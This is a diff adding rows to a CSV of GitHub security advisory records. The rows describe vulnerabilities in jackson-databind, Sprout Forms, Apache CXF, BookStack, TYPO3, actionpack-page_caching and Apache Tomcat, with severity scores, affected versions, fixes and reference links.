+1.4.0,GHSA-cf6r-3wgc-h863,2023-09-14T15:07:13Z,2020-05-15T18:58:58Z,,['CVE-2019-14892'],Polymorphic deserialization of malicious object in jackson-databind,"A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5, and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.7.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.7.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.8.11.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.11.4'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14892'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2462'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/819cdbcab51c6da9fb896380f2d46e9b7d4fdc3b'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0729'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200904-0005/'}]","{'cwe_ids': ['CWE-200', 'CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T19:29:41Z', 'nvd_published_at': '2020-03-02T17:15:00Z'}"
+1.4.0,GHSA-px8v-hxxx-2rgh,2021-10-27T17:00:42Z,2020-05-08T21:00:02Z,,['CVE-2020-11056'],Potential Code Injection in Sprout Forms,"### Impact
+
+A potential Server-Side Template Injection vulnerability exists in Sprout Forms which could lead to the execution of Twig code.
+
+### Patches
+
+The problem is fixed in`barrelstrength/sprout-forms:v3.9.0` which upgrades to `barrelstrength/sprout-base-email:v1.2.7`
+
+### Workarounds
+
+Users unable to upgrade should update any Notification Emails to use the ""Basic Notification (Sprout Email)"" template and avoid using the ""Basic Notification (Sprout Forms)"" template or any custom templates that display Form Fields.
+
+### References
+
+- See the release notes in the [CHANGELOG](https://github.com/barrelstrength/craft-sprout-forms/blob/v3/CHANGELOG.md#390---2020-04-09-critical)
+- Credits to Paweł Hałdrzyński, Daniel Kalinowski from [ISEC.PL](https://isec.pl/) for discovery and responsible disclosure
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in the [Sprout Forms repo](https://github.com/barrelstrength/craft-sprout-forms/issues)
+* Email us at [sprout@barrelstrengthdesign.com](mailto:sprout@barrelstrengthdesign.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'barrelstrength/sprout-base-email'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'barrelstrength/sprout-forms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/barrelstrength/craft-sprout-forms/security/advisories/GHSA-px8v-hxxx-2rgh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11056'}, {'type': 'WEB', 'url': 'https://github.com/barrelstrength/craft-sprout-base-email/commit/5ef759f4713ede6dbf77c9d9df9f992876e43a49'}, {'type': 'WEB', 'url': 'https://github.com/barrelstrength/craft-sprout-forms/blob/v3/CHANGELOG.md#390---2020-04-09-critical'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-08T19:12:33Z', 'nvd_published_at': '2020-05-07T21:15:00Z'}"
+1.4.0,GHSA-42f2-f9vc-6365,2021-06-15T17:26:32Z,2020-05-22T19:23:04Z,,['CVE-2019-12423'],Private key leak in Apache CXF,"Apache CXF ships with a OpenId Connect JWK Keys service, which allows a client to obtain the public keys in JWK format, which can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifing the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However it is also possible to obtain the keys from a JWK keystore file, by setting the configuration parameter `rs.security.keystore.type` to `jwk`. For this case all keys are returned in this file "as is", including all private key and secret key credentials. This is an obvious security risk if the user has configured the signature keystore file with private or secret key credentials. From CXF 3.3.5 and 3.2.12, it is mandatory to specify an alias corresponding to the id of the key in the JWK file, and only this key is returned. In addition, any private key information is omitted by default. `oct` keys, which contain secret keys, are not returned at all.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:apache-cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:apache-cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.3.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.3.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12423'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r36e44ffc1a9b365327df62cdfaabe85b9a5637de102cea07d79b2dbf@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd588ff96f18563aeb5f87ac8c6bce7aae86cb1a4d4be483f96e7208c@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rff42cfa5e7d75b7c1af0e37589140a8f1999e578a75738740b244bd4@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://cxf.apache.org/security-advisories.data/CVE-2019-12423.txt.asc?version=1&modificationDate=1579178393000&api=v2'}]","{'cwe_ids': ['CWE-522'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-22T19:22:30Z', 'nvd_published_at': '2020-01-16T18:15:00Z'}"
+1.4.0,GHSA-5vf7-q87h-pg6w,2021-01-08T20:20:35Z,2020-05-07T21:10:26Z,,['CVE-2020-11055'],Cross-Site Scripting in BookStack,"### Impact
+
+A user with permission to create comments could POST HTML directly to the system to be saved in a comment, which would then be executed/displayed to others users viewing the comment. Through this vulnerability custom JavaScript code could be injected and therefore ran on other user machines.
+
+This most impacts scenarios where not-trusted users are given permission to create comments.
+
+### Patches
+
+The issue was addressed in BookStack v0.29.2.
+
+After upgrading, The command `php artisan bookstack:regenerate-comment-content` should be ran to remove any pre-existing dangerous content.
+
+### Workarounds
+
+Comments can be disabled in the system settings to prevent them being shown to users. Alternatively, comment creation permissions can be altered as required to only those who are trusted but this will not address existing exploitation of this vulnerability.
+
+### References
+
+* [BookStack Beta v0.29.2](https://github.com/BookStackApp/BookStack/releases/tag/v0.29.2)
+* JVN#41035278
+* [BookStack Blog Post](https://bookstackapp.com/blog/beta-release-v0-29-2/)
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [the BookStack GitHub repository](BookStackApp/BookStack/issues).
+* Ask on the [BookStack Discord chat](https://discord.gg/ztkBqR2).
+* Follow the [BookStack Security Advice](https://github.com/BookStackApp/BookStack#-security) to contact someone privately.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ssddanbrown/bookstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.29.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/BookStackApp/BookStack/security/advisories/GHSA-5vf7-q87h-pg6w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11055'}, {'type': 'WEB', 'url': 'https://bookstackapp.com/blog/beta-release-v0-29-2/'}, {'type': 'WEB', 'url': 'https://github.com/BookStackApp/BookStack/releases/tag/v0.29.2'}, {'type': 'WEB', 'url': 'http://jvn.jp/en/jp/JVN41035278/index.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-07T18:36:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-43gj-mj2w-wh46,2021-01-08T20:16:50Z,2020-05-13T23:17:48Z,,['CVE-2020-11064'],Cross-Site Scripting in TYPO3 CMS Form Engine,"In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.17 and greater than or equal to 10.0.0 and less than 10.4.2, it has been discovered that HTML `placeholder` attributes containing data of other database records are vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability.
+
+Update to TYPO3 versions 9.5.17 or 10.4.2 that fix the problem described.
+
+### References
+* https://typo3.org/security/advisory/typo3-core-sa-2020-002","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.17'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-43gj-mj2w-wh46'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11064'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T22:54:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9vvp-fxw6-jcxr,2021-08-25T21:00:41Z,2020-05-15T18:58:47Z,,['CVE-2020-11113'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11113'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2670'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200403-0002/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T19:31:52Z', 'nvd_published_at': '2020-03-31T05:15:00Z'}"
+1.4.0,GHSA-mg5p-95m9-rmfp,2021-07-26T21:16:26Z,2020-05-13T16:28:46Z,,['CVE-2020-8159'],Arbitrary file write in actionpack-page_caching gem,"There is a vulnerability in actionpack_page-caching gem < v1.2.1 that allows an attacker to write arbitrary files to a web server, potentially resulting in remote code execution if the attacker can write unescaped ERB to a view.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack-page_caching'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8159'}, {'type': 'WEB', 'url': 'https://github.com/rails/actionpack-page_caching/commit/127da70a559bed4fc573fdb4a6d498a7d5815ce2'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/rubyonrails-security/CFRVkEytdP8'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00019.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T16:28:30Z', 'nvd_published_at': '2020-05-12T13:15:00Z'}"
+1.4.0,GHSA-344f-f5vg-2jfj,2022-02-08T22:05:47Z,2020-05-21T18:52:29Z,,['CVE-2020-9484'],Potential remote code execution in Apache Tomcat,"When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter=""null"" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat-catalina'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-M1'}, {'fixed': '10.0.0-M5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.0-M4'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat-catalina'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.35'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat-catalina'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.5.55'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat-catalina'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.104'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9484'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/3aa8f28db7efb311cdd1b6fe15a9cd3b167a2222.patch'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/bb33048e3f9b4f2b70e4da2e6c4e34ca89023b1b'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=1171928'}, {'type': 'WEB', 'url': 'https://kc.mcafee.com/corporate/index?page=content&id=SB10332'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r123b3ebe389f46f9d337923f393cdae4d3e9b78d982d706712f0898c@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r26950738f4b4ca2d256597cf391d52d3450fa665c297ea5ca38f5469@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r77eae567ed829da9012cadb29af17f2df8fa23bf66faf88229857bb1%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bc247fffcb1d58415215c861d2354bd653c86266230d78a93c71ae2@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8dd19c514face6dd85fd4eab0271854883f40c7307926c1f7cd5400c@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raa4123e472175bb052fbba165d37187cea923f755e8f3f30d124cb3f@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc1778b38e74b5b6142414d57623bd55b023a72361f422836782fca3c@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc8473b08abdf3c16494ed817bec1717a0ee0c8080315bc27db5f21c3@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf59c72572b9fee674a5d5cc6afeca4ffc3918a02c354a81cc50b7119@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf70f53af27e04869bdac18b1fc14a3ee529e59eb12292c8791a77926@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00020.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/07/msg00010.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GIQHXENTLYUNOES4LXVNJ2NCUQQRF5VJ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WJ7XHKWJWDNWXUJH6UB7CLIW4TWOZ26N/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-21'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200528-0005/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4448-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4596-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4727'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00057.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2020/Jun/6'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/01/2'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-21T17:21:20Z', 'nvd_published_at': '2020-05-20T19:15:00Z'}"